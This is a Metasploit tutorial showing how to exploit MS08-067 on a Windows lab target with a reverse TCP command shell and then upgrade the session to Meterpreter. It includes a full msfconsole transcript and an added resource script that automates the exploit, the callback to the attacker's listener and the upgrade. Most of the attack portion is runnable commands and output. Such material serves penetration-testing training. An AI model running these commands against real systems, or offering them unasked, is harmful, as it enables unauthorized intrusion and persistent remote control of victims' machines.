One of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter payload once the system has been exploited, by issuing the sessions -u command. This is useful if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks into the network. Let's look at a quick example from start to finish using MS08-067 with a reverse command shell as the payload, and then upgrade it to a Meterpreter shell.
root@bt:/opt/framework3/msf3# msfconsole

msf > search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...

Exploits
========

   Name                           Rank   Description
   ----                           ----   -----------
   windows/smb/ms08_067_netapi    great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress -   3.16% done (1694/53587 bytes)
[*] Command Stager progress -   6.32% done (3388/53587 bytes)
. . . SNIP . . .
[*] Command Stager progress -  97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) >
[*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Before running the exploit, we issue the setg command for LHOST and LPORT. This is required in order for sessions -u 1 to upgrade the shell to Meterpreter: the upgrade starts a fresh handler for the Meterpreter payload, and it takes the listener address and port from these values (notice the second "Started reverse handler on 192.168.33.129:8080" line after sessions -u 1). The setg command sets LHOST and LPORT globally in Metasploit, not just for this exploit, which is why the upgrade can see them.
Notice that when we exploit the system we issue the exploit -z command, which runs the exploit but does not drop us into the session once the target has been exploited; the new session is created in the background instead, leaving us at the msf prompt to run sessions -u. If you had already executed a plain exploit command at this point and were sitting in the command shell, you could simply press CTRL-Z to background the session and then run sessions -u from the prompt. Also note that the upgrade does not replace the original shell: session 1 (the command shell) remains open alongside the new Meterpreter session 2, so list them with sessions -l and kill the shell with sessions -k 1 once you no longer need it.
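The same sequence can be scripted as an msfconsole resource file and run with msfconsole -r upgrade_shell.rc, which is handy when you want the upgrade to happen automatically after a reverse shell lands. The script below is an added example, not from the book or the Metasploit project; it assumes the lab addresses from the listing (attacker 192.168.33.129, target 192.168.33.130, the latter taken from the session line and set as RHOST, which the listing does not show being set) and that the first session opened is the command shell to upgrade. The sleep lines give the handler time to receive the shell and then the stager before the script moves on.

```msf
# upgrade_shell.rc (added example, not from the book).
# Assumed lab values: LHOST 192.168.33.129 (attacker), RHOST 192.168.33.130 (target).
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
set TARGET 3
set RHOST 192.168.33.130

# setg, not set: sessions -u starts its own handler and reads LHOST/LPORT
# from the global datastore, not from this exploit's options.
setg LHOST 192.168.33.129
setg LPORT 8080

# -j runs the exploit as a background job, -z never interacts with the
# session, so the script keeps control of the msf prompt.
exploit -j -z

# Give the reverse shell time to connect back before upgrading it.
# Assumes the shell lands as session 1 (first session of this run).
sleep 15
sessions -u 1

# The command stager takes a while to push the Meterpreter stage; wait,
# then list sessions. Expect two: the original shell (1) and Meterpreter (2).
sleep 30
sessions -l
```

Once sessions -l shows the Meterpreter session, attach to it with sessions -i 2 as in the listing; the original command shell (session 1) is still open and should be killed with sessions -k 1 if it is no longer needed. If the target shell takes longer than the sleep to call back, sessions -u 1 fails because there is no session 1 yet, so lengthen the first sleep or run the upgrade interactively.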